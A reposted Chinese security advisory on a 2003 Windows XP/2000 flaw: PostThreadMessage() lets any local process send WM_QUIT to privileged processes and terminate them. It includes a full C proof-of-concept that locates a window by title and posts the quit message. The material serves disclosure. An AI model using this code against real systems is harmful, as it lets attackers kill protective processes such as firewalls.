Microsoft Windows PostThreadMessage()任意进程可结束漏洞---win-为中国网络技术提供点滴动力-iyit.net-易特网络技术！

　　通行证: 用户密码

域名空间　下载中心　 社区论坛　信息公告 MY小屋

联系我们
设为首页
加入收藏

QQ,ASP,PHP,JSP,XML,SQL,.Net,编程程序网页图象建站经验私服




	当前位置：首页>>操作系统>>系统优化技巧>>正文	新版上线！[旧版]

注:打开慢时请稍等

Microsoft Windows PostThreadMessage()任意进程可结束漏洞

http://www.iyit.net 日期：2006-5-19 11:02:10 来源：网络转载点击：

【参加讨论】

信息提供：
安全公告（或线索）提供热线：51cto.editor@gmail.com
漏洞类别：
设计错误
攻击类型：
本地越权访问
发布日期：
2003-10-02
更新日期：
2003-10-09
受影响系统：
Microsoft Windows XP Tablet PC Edition
Microsoft Windows XP Professional SP1
Microsoft Windows XP Professional
Microsoft Windows XP Media Center Edition
Microsoft Windows XP Home SP1
Microsoft Windows XP Home
Microsoft Windows XP Embedded SP1
Microsoft Windows XP Embedded
Microsoft Windows 2000SP4
Microsoft Windows 2000SP3
Microsoft Windows 2000SP2
Microsoft Windows 2000SP1
Microsoft Windows 2000
安全系统：
无
漏洞报告人：
Brett Moore （brett.moore@SECURITY-ASSESSMENT.COM）
漏洞描述：
BUGTRAQ  ID: 8747

Microsoft Windows是微软开发和维护的操作系统。

Microsoft Windows在通过PostThreadMessage() API调用处理从另一进程发送的消息时存在问题，本地攻击者可以利用这个漏洞杀掉系统任意进程。

PostThreadMessage函数在指定线程的消息队列中放置消息，然后不等线程处理消息就返回。但Windows操作系统在处理消息机制上存在问题，通过PostThreadMessage函数给进程发一个WM_QUIT的消息，目标进程就会结束，虽然进程（服务）是以system权限运行的，但是没有对发送消息的进程进行有限的权限判别，因此任何进程可以向高权限进程发送消息，如给它发一个WM_QUIT消息，会导致进程退出。

不过一般对防火墙等进程进行操作时，会提示需要密码才能完成操作。

测试方法：
警告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！
Brett Moore（brett.moore@SECURITY-ASSESSMENT.COM）提供了如下测试程序：

#include <windows.h>
#include <commctrl.h>
#include <stdio.h>
char tWindow[]="Windows Task Manager";// The name of the main window
char* pWindow;
int main(int argc, char *argv[])
{
        long hWnd,proc;
        DWORD hThread;
        printf("%% AppShutdown - Playing with PostThreadMessage\n");
        printf("%% brett.moore@security-assessment.com\n\n");
        // Specify Window Title On Command Line
        if (argc ==2)
                pWindow = argv[1];
        else
                pWindow = tWindow;

        printf("+ Finding %s Window...\n",pWindow);
        hWnd = (long)FindWindow(NULL,pWindow);
        if(hWnd == NULL)
        {
          printf("+ Couldn't Find %s Window\n",pWindow);
          return 0;
        }
        printf("+ Found Main Window At...0x%xh\n",hWnd);
        printf("+ Finding Window Thread..");
        hThread = GetWindowThreadProcessId(hWnd,&proc);
        if(hThread  == NULL)
        {
          printf("Failed\n");
          return 0;
        }
        printf("0x%xh Process 0x%xh\n",hThread,proc);
        printf("+ Send Quit Message\n");
        PostThreadMessage((DWORD) hThread,(UINT) WM_QUIT,0,0);
        printf("+ Done...\n");
        return 0;
}

解决方法：
厂商补丁：

Microsoft
---------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.microsoft.com/technet/security/

编辑：黑鹰　[发送给好友] [打印本页] [关闭窗口] [返回顶部]
上一篇：kernel32.dll出错解决方案
下一篇：Microsoft Windows RPCSS多线程进程条件漏洞
转载请注明来源：www.iyit.net
特别声明： 本站除部分特别声明禁止转载的专稿外的其他文章可以自由转载，但请务必注明出处和原始作者。文章版权归文章原始作者所有。对于被本站转载文章的个人和网站，我们表示深深的谢意。如果本站转载的文章有版权问题请联系编辑人员，我们尽快予以更正。

　相关文章

winbackup.exe - winbackup	winoa386.mod - winoa386	winmgmt.exe - winmgmt
winlogon.exe - winlogon	winwan.exe - winwan	winvnc.exe - winvnc
winupdates.exe - winupdates	wintools.exe - wintools	wintasks.exe - wintasks
wintask.exe - wintask	winsys32.exe - winsys32	winsys.exe - winsys
winstat.exe - winstat	winstall.exe - winstall	winsrv32.exe - winsrv32
winsocks.exe - winsocks	winservsuit.exe - winservsuit	winservs.exe - winservs
winservices.exe - winservices	winservad.exe - winservad	winserv.exe - winserv
wins.exe - wins	winroute.exe - winroute	winrecon.exe - winrecon

推荐新闻

Windows XP专业版IIS连接数的更改

Office2007简体中文版浮出水面美图抢

AMD处理器AM2测试　风扇竟运行7分钟

exeplorer.exe错误的问题的总结、解决

ASP.NET 2.0 中的异步页功能应用

Office2007简体中文版浮出水面美图抢

0689版Windows Live Messenger五大看点

	友情链接

	Copyrights © 2004-2006 iYiT.Net All Rights Reserved. 网站合作、广告联系QQ:147007642、466949678
	易特网络技术冀ICP备05011851号		浏览器不支持嵌入式框架，或被配置为不显示嵌入式框架。